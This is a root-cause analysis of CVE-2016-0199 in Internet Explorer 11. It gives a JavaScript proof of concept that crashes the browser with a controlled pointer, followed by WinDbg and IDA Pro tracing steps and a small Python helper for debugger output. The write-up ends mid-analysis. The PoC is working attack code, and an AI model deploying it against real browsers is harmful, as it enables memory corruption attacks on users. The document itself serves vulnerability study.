CVE-2016-0199

0x0 Environment:

  • Windows 7 SP1 32-bit
  • IE 11
  • Windbg

0x1 PoC:

<meta http-equiv="X-UA-Compatible" content="IE=7">
<script>
oElement = document.createElement("IMG");
var oAttr = document.createAttribute("loop");
oAttr.nodeValue = oElement;
oElement.loop = 0x41424344;
oElement.setAttributeNode(oAttr);
oElement.removeAttributeNode(oAttr);
CollectGarbage();
</script>

0x2 Vulnerability Reproduction

Run the PoC and catch the crash in WinDbg. Here we get an access violation exception:

jscript9!JavascriptThreadService::EnumerateTrackingClient+0x59252:
695b0de2 8b30            mov     esi,dword ptr [eax]  ds:0023:41424344=????????

Next we need to locate this code in jscript9.dll in IDA Pro. The faulting address is 0x695b0de2, so we first need the base address of the DLL:

lmvm jscript9

lmvm dumps information about the module. Remember to pass the module name without the extension (jscript9, not jscript9.dll).

The start address is 0x693b0000, so the address we want to check in IDA Pro (which loads the DLL at the base 0x10000000) is:

2:051> ? 695b0de2 - 693b0000 + 10000000

So the address is 0x10200de2.

In IDA Pro, locate the code. Based on the disassembly:

.text:10200DE2                 mov     esi, [eax]
.text:10200DE4                 mov     ecx, [esi+44h]  ; void *
.text:10200DE7                 call    ds:___guard_check_icall_fptr
.text:10200DED                 call    dword ptr [esi+44h]

we can guess that eax holds the base address of a C++ object and that the vtable address is stored at that address - 4. To verify the assumption, modify the PoC:

<meta http-equiv="X-UA-Compatible" content="IE=7">
<script>
alert(0);
oElement = document.createElement("IMG");
alert(1);
var oAttr = document.createAttribute("loop");
alert(2);
oAttr.nodeValue = oElement;
alert(3);
CollectGarbage();
</script>

We want to set a breakpoint at jscript9!JavascriptThreadService::EnumerateTrackingClient+0x59252.

However, the DLL is not loaded yet when we restart debugging. We can use the WinDbg command sxe ld:modulename to break when jscript9.dll is loaded for the first time, and then set the breakpoint on that address:

sxe ld:jscript9
lmm jscript9
bp jscript9!JavascriptThreadService::EnumerateTrackingClient+0x59252
bl

As you can see, we get the vtable address.

Next rewrite the poc:

<meta http-equiv="X-UA-Compatible" content="IE=7">
<script>
alert(0);
oElement = document.createElement("IMG");
alert(1);
var oAttr = document.createAttribute("loop");
alert(2);
oAttr.nodeValue = oElement;
alert(3);
oElement.loop = 0x41424344;
alert(4);
oElement.setAttributeNode(oAttr);
alert(5);
oElement.removeAttributeNode(oAttr);
alert(6);
CollectGarbage();
</script>

The PoC creates an IMG object and a loop attribute, so we need to find the addresses of these two objects. First enable page heap (hpa) and user-mode stack traces (ust) for iexplore.exe:

gflags /i iexplore.exe +hpa +ust

Then open the PoC file in IE, attach WinDbg,

and use x MSHTML!CImgElement::* to list all CImgElement functions.

The CreateElement function creates the object. Set a breakpoint there and run:

bp MSHTML!CImgElement::CreateElement; g

Click the message box in the web page and we hit the breakpoint:

Step in and single-step with p, repeated several times:

p

HeapAlloc creates a buffer of size 0x5c; its address is returned in eax: 0x0d524fa0.

Address 0x0d524fa0 will be the IMG object's address. But why?

Keep going with a few more p steps:

Before calling MSHTML!CImgElement::CImgElement, ecx contains the eax value 0d524fa0, so that buffer is the object being constructed.

Use dps command (display pointers and symbols):

dps 0d524fa0

This is the vtable address.

Next, search for the Attribute object base address:

x MSHTML!CAttribute::*

MSHTML!CAttribute::CAttribute is the constructor. Put a breakpoint there:

bp MSHTML!CAttribute::CAttribute

and g; this hits alert(1) in the PoC. Click OK.

Keep stepping in until we reach here:

The attribute object base address is in ebx and its value is 0x0d5a2fa0.

So the address of the IMG object is 0x0d524fa0 and the address of the Attribute object is 0x0d5a2fa0.

Back to PoC:

oAttr.nodeValue = oElement;

This line assigns the IMG object to a member of the attribute object. Let's search for the function that does this:

x MSHTML!CAttribute::*

It seems MSHTML!CAttribute::put_nodeValue does this. Set the breakpoint and go:

bp MSHTML!CAttribute::put_nodeValue; g

Click OK

and we reach MSHTML!CAttribute::put_nodeValue.

Check the call stack, then:

dps 0d5a2fa0

The breakpoint seems correct: put_nodeValue appears to be the entry point of the assignment. Keep going.

Use the t command to trace down, then:

dps 0d5a2fa0

Now we can see that the IMG object address has been copied into the attribute object at offset 0x30.

next in POC:

oElement.loop = 0x41424344;

We want to locate where this value ends up in memory. First,

run s-d 0x0 L?0x7fffffff 41424344 to find every existing occurrence of 41424344, then execute the line and search again; the extra hit should be the address of the 41424344 written by the PoC.

Then keep going: press g and, after the alert(4) popup,

run s-d 0x0 L?0x7fffffff 41424344

We have a new address, 0x14162fc8:

!heap -p -a 14162fc8

The UserAddr is 14162fc0, so the memory was allocated from 14162fc0 and the address of 41424344 is 8 bytes after it.
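Two of the bookkeeping steps above (diffing the two s-d searches to find the new hit, and rebasing a live address to the IDA image base as done in 0x2) are easy to script. The following helper is an added example, not part of the original write-up; the s-d output lines it parses are constructed samples, and the function names are the author's own.

```python
import re

# Constructed sample output of the WinDbg command "s -d 0x0 L?0x7fffffff 41424344",
# captured before and after the PoC line "oElement.loop = 0x41424344" runs.
# These lines are made up for the example, not taken from a real session.
SEARCH_BEFORE = """\
0c3f1020  41424344 00000000 00000000 00000000  DCBA............
0c5a0fe0  41424344 00000000 00000000 00000000  DCBA............
"""
SEARCH_AFTER = """\
0c3f1020  41424344 00000000 00000000 00000000  DCBA............
0c5a0fe0  41424344 00000000 00000000 00000000  DCBA............
14162fc8  41424344 00000000 00000000 00000000  DCBA............
"""

# An s-d hit line starts with the 8-hex-digit address followed by the matched dword.
_HIT_RE = re.compile(r"^\s*([0-9a-fA-F]{8})\s+[0-9a-fA-F]{8}")


def parse_search_hits(output: str) -> set:
    """Return the set of hit addresses found in s-d output."""
    hits = set()
    for line in output.splitlines():
        m = _HIT_RE.match(line)
        if m:
            hits.add(int(m.group(1), 16))
    return hits


def new_hits(before: str, after: str) -> list:
    """Addresses that appear only after the PoC line ran: the copy the PoC wrote."""
    return sorted(parse_search_hits(after) - parse_search_hits(before))


def offset_in_allocation(hit: int, user_addr: int) -> int:
    """Offset of a hit inside the heap block whose UserAddr '!heap -p -a' reported."""
    return hit - user_addr


def rebase_to_ida(runtime_addr: int, module_base: int, ida_base: int = 0x10000000) -> int:
    """Translate a live address (module base from 'lmvm') to the base IDA loaded the DLL at."""
    return runtime_addr - module_base + ida_base


if __name__ == "__main__":
    for h in new_hits(SEARCH_BEFORE, SEARCH_AFTER):
        print(f"new hit at {h:08x}, offset {offset_in_allocation(h, 0x14162fc0):#x} into the allocation")
    print(f"crash site in IDA: {rebase_to_ida(0x695b0de2, 0x693b0000):#x}")
```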

Set a breakpoint:

bp MSHTML!CImplAry::EnsureSizeWorker+0x00000063

HeapAlloc allocates memory; the address is 12fd1fc0.

step in and check edi:

dps edi

Now remember that the IMG object address is 0x0d524fa0.

The whole process is:

back to POC:

oElement.setAttributeNode(oAttr);

Run x mshtml!CElement::setAttributeNode

and set the breakpoint: bp mshtml!CElement::setAttributeNode

and finally we get: